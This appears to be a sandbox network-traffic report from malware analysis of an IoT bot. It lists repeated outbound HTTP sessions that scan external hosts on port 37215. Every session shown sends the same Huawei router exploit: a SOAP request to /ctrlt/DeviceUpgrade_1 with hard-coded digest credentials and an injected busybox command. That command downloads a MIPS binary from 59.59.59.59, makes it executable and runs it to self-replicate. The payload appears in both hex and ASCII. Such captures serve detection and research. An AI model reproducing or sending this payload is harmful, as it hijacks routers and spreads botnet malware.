                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1973192.168.2.1555092197.166.51.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.047890902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1974192.168.2.1534386157.138.31.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.047995090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1975192.168.2.1553670197.30.64.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.048115969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1976192.168.2.1550908142.166.70.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.992479086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1977192.168.2.1533396140.74.96.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.992517948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1978192.168.2.1559842157.183.223.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.992558002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1979192.168.2.1541702157.18.175.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.992597103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1980192.168.2.155973442.124.179.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.010725021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1981192.168.2.1543928133.100.104.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.018652916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1982192.168.2.1535150157.87.210.12637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.018682003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 